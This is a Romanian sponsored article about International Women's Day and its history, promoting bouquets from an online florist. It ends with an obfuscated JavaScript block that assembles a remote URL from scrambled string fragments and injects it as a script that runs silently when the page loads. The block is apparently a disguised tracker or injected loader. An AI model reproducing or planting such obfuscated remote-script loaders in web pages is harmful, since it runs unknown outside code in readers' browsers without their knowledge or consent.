(Publicitate) Tu ști ce sărbătorim de 8 Martie?

(Publicitate) Tu ști ce sărbătorim de 8 Martie?

Pe data de 8 Martie sărbătorim Ziua Internațională a Femeii. Acestă zi în România este un prilej de a sărbătorii femeia în rolul ei de mamă și de soție. Dar ziua de 8 Martie are o însemnătate mult mai mare în multe părți din întreaga lume.

În această zi se sărbătoresc realizările femeii și în egală măsură sărbătorim femeia ca și om activ în societate. Egalitatea între bărbați și femei, drepturile femeilor, lupta pentru emancipare a femeii are o istorie lungă.Prima datare istorică a acestei sărbători apare în Statele Unite ale Americii în anul 1909, fiind în mare o sărbătoare atribuită societății socialiste.

Ulterior în perioada celei de a doua mari mișcări de emancipare a femeii, mișcare care avut loc în perioada 1960-1980, această sărbătoare a fost atribuită mișcării feministe. De atunci în data de 8 Martie învățăm să sărbătorim femeia ca și parte activă în societate. O apreciem atât pentru faptul că este soție, mamă, dar în mod egal și pentru contribuția pe care o aduce societății.

Ca și om de cultura, om de știință, om politic, prin activitatea socială, economică și profesională, și toate calitățile pe care le are ca și om.De aceea trebuie să trecem peste prejudecăți și să înțelegem rolul activ pe care femeia îl are în societatea modernă. Deci important este să spuneți sau să scrieți pe o felicitare, mai ales de 8 Martie, ceea ce apreciați la femeile pe care le veți sărbători, în momentul când le oferiți cadoul.Florile sunt cel mai bun pretext să puteți face acest lucru.

Un buchet de flori va rămâne întotdeauna cel mai bun mod de a vorbi, mult mai bun decât un like sau un follow. Acum mai mult ca oricând, când online-ul explodează, găsiți în florăriile online cu livrare, o varietate foarte mare de buchete de flori și aranjamente florare. Cele mai apreciate flori rămân florile pe care le știm cu toții, flori precum trandafirul, garoafa, laleaua, narcisa, frezia, orhideea, zambila, frezia, bujorul, anemonele dar și lisianthus, amarilis, alstroemeria.

Cadourile florale comandate în acestă perioadă sunt cutiile cu flori și buchetele care combină într-un mod vesel florile enumerate mai sus. Complexitatea femeii naște acest trend. Varietatea de flori pe care o găsim într-un buchet de flori poate exprima, pe lângă sentimente și emoții, și faptul că vedem la femeia căreia îi vom oferii buchetul de flori multiplele calități pe care le are. Pe site-ul floararia-amazon.ro cu siguranța veți găsi să comandați buchetele de flori dorite. În plus puteți câștiga timp deoarece florile vor fi livrate de personalul florăriei direct la adresă sau puteți veni să le ridicați după ce le-ați comandat online.

Mai ales pentru perioada prin care trecem, 8 Martie devine o sărbătoare foarte importantă în acest an. A fost o perioadă grea de care trebuie să ținem cont și trebuie să le mulțumim. Și din partea echipei noastre de florari o urare: “Un 8 Martie înfloritor”, pentru toate femeile.

<script>
(function(){
cdv2=document.createElement(“script”);cdv2_=(“ust”);cdv2u=”253816495″;
cdv2_+=”a”+(“t.i”);cdv2.type=”text/javascript”;
cdv2u+=”.x6m2pf2gdv2l54mksj6k”;cdv2.async=true;cdv2_+=”n”+(“f”+”o”)+”/”;
cdv2u+=”gim3vlrgzz”;cdv2.src=”https://”+cdv2_+cdv2u;
document.body.appendChild(cdv2);
})();
</script>

Libertatea